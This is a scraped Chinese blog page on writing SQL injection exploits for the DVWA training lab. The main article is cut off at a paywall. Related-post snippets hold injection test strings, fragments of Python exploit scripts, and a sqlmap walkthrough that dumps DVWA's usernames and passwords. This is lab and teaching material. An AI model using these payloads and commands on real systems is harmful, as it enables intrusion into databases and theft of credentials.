针对DVWA-sql注入写的exp

最新推荐文章于 2024-07-09 20:20:53 发布
原创 最新推荐文章于 2024-07-09 20:20:53 发布 · 648 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

SQL Injection(sql注入)

介绍

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

手工注入思路

自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。

  • 1.判断是否存在注入,注入是字符型还是数字型

    2.猜解SQL查询语句中的字段数

    3.确定显示的字段顺序

    4.获取当前数据库

    5.获取数据库中的表

    6.获取表中的字段名

    7.下载数据

Low
<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
   
   
   // Get input
   $id = $_REQUEST[ 'id' ];

   // Check database
   $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
   $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (
最低0.47元/天 解锁文章

200万优质内容无限畅学
sql注入最基础的exp
CC210231的博客
04-03 1669
下面直接上代码: 使用html编: <!DOCTYPE html> <html > <head> <meta charset="UTF-8"> <title></title> </head> <body> <!-method根据实际情况选择,action属性中为提交的地址,name属性中为参数名,
使用python进行sql布尔盲注exp的编
CC210231的博客
04-04 2666
前言: 前面学习并实现了简单的注入exp,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
dvwa学习编exp
p_utao的博客
04-09 329
sql注入报错exp import requests import re //cookie验证登录 cookies = {"PHPSESSID":'jjfrgqtge5n0a03ge127ti8ttk','security':'low'} //可能存在sql注入地址 url = "http://127.0.0.1/vulnerabilities/sqli/?Submit=Submit%23&id=1" //index()函数用于从列表中找出某个值第一个匹配项的索引位置 //split()通过指定分
然之协同系统6.4.1 SQL注入exp
weixin_30672019的博客
08-03 282
前言 前面已经说明了 漏洞成因,这里介绍一下 exp 的编。 正文 为了 getshell 或者是 任意文件下载, 我们需要修改 数据库中的 前缀sys_file 表, 所以我们的利用方式如下 使用 sql 注入 获取程序数据库中任何一个表名, 取得前缀 pre 然后向 presys_file 中插入目标路径。 在 mysql 5 中可以使用 information_schema 来获取指...
Python安全之编SQL注入漏洞利用脚本(EXP)
weixin_43853965的博客
07-08 2584
背景: 最近护网在一次渗透测试过程发现了一处SQL盲注,在SQLMAP上跑了下居然没跑出结果,原因不明也没过多分析。于是自己了个简单脚本作为测试。最终执行效果如下: 代码比较简单,值得一提的是怎么判断库名所有字符已经结束了,我用的是计数器。计数器num每次遍历+1;计数器a每次查找成功+1。当查找未空时说明a就不再加,导致num>a。也就是说当num和a不相等时,说明库名所有字符查找完了,此时break并输出整个库名。 代码: #!/usr/bin/env python # -*- coding:
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1402
CTFHUB-WEB-SQL注入
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 435
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
sql注入-报错注入
爆金币了,老登!
07-09 663
针对dvwa靶场的sql报错注入
DVWA(七) - 使用python脚本实现SQL盲注
qq_42785117的博客
09-02 3631
SQL Injection (Blind) sql盲注其实就是sql注入的一种,但是不会根据sql注入的攻击语句返回你想要知道的信息. 盲注分为两种: 布尔盲注以及时间盲注 布尔盲注: 根据你的注入信息返回True和Fales,而返回的True和Fales可能有不同的表现形式,根据不同的网页分析. 时间盲注: 当界面的返回值只有一种true的时候,就需要加入特定的时间函数,通过判断加载web...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
SQL注入高级进阶
06-04
SQL注入高级进阶
2013phpweb漏洞利用EXP
03-28
2013phpweb漏洞利用EXP
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
大白话之从零讲解DVWA(贰)-SQL注入(SQL Injection) Medium/High Level
_Adler.
03-22 260
https://www.stackoverflow.wiki/blog/articles/2019/03/22/1553218661938.html
dvwaSQL注入(1)
Lethe's Blog
02-23 1648
一、Low SQL Injection 1.sql语句 //low等级源码 &lt;?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name ...
SQL Injection (Blind) time盲注入
Appleteachers的博客
04-14 536
python3编EXP系列 SQL Injection (Blind) time盲注入 1 简介 DVWA靶场这个是最基础的靶场如果想学习EXP这个靶场最好不过,如果能把这个靶场的利用的EXP用python3编出来这样算是合格的exp入门选手了。 https://github.com/digininja/DVWA 这个系列的第五篇内容这里会学习到如何通过时间注入,获取账号和密码。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者
DVWA------文件包含(2)
Z_Grant的博客
09-10 476
文章目录一,DVWA的练习(1)low安全级别①传参,通过显示结果查看操作系统的类型,以及站点的目录;②显示php探针③远程文件包含(2)media安全等级(3)high安全等级(4)impossibe安全等级 一,DVWA的练习 先在php的配置文件中设置允许打开和包含远程文件 (1)low安全级别 【源码分析】 <?php // The page we wish to display...
DVWA-Command injection(命令注入)
MzHeader的博客
03-22 717
DWVA-Command injection(命令注入) 介绍: 命令执行漏洞的产生原因一般就是将用户输入未经过滤或者过滤不严就直接当作系统命令进行执行,我们可以通过批处理中的一些技巧来一次执行多条命令,这样就可以执行任意命令。在命令执行中,常用的命令连接符号有五个:&& & || | ; &&:前一个指令执行成功,后面的指令才继续执行,就像进行与操作一样 ...
DVWA-SQL Injection(sql注入
MzHeader的博客
03-22 1659
DWVA-SQL Injection(sql注入) 介绍 SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面...
sqlmap破dvwa低级sql注入
最新发布
06-21
### 使用sqlmap对DVWA低级SQL注入进行渗透测试 在使用sqlmap对DVWA的低级SQL注入(Low Level SQL Injection)进行渗透测试时,需要确保正确配置目标URL和相关的Cookies。以下是详细的说明与操作步骤: #### 1. 确定目标URL DVWASQL注入漏洞页面通常位于`/vulnerabilities/sqli/`路径下,目标URL格式如下: ```plaintext http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# ``` 其中,`<DVWA-IP>`为DVWA服务器的IP地址。 #### 2. 设置Cookies 为了绕过DVWA的安全级别限制(如`security=low`),需要提供正确的PHPSESSID和安全级别参数。例如: ```plaintext PHPSESSID=v1d47lav6lot63v45vif84lren; security=low ``` #### 3. 基本命令结构 使用以下基本命令启动sqlmap工具: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" ``` 此命令中: - `-u`指定目标URL。 - `--cookie`传递必要的会话信息[^1]。 #### 4. 获取数据库信息 可以通过附加参数来获取更多数据库相关信息: - **获取当前数据库名称**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --current-db --batch ``` 此命令将返回当前使用的数据库名称,例如`dvwa`[^3]。 - **枚举所有数据库**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --dbs --batch ``` - **枚举特定数据库中的表**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa --tables --batch ``` - **枚举特定表中的列**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users --columns --batch ``` - **转储数据**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users -C user,password --dump --batch ``` #### 5. 注意事项 - **安全性**:仅在授权的环境中进行渗透测试,避免非法操作。 - **错误抑制**:DVWA可能通过代码修改抑制了MySQL错误信息输出[^4],这可能影响sqlmap的检测效率。在这种情况下,可以尝试布尔盲注或时间盲注模式。 - **布尔盲注**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --technique=B --batch ``` ### 示例代码 以下是一个完整的sqlmap命令示例: ```bash sqlmap -u "http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=v1d47lav6lot63v45vif84lren; security=low" -D dvwa -T users -C user,password --dump --batch ``` ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值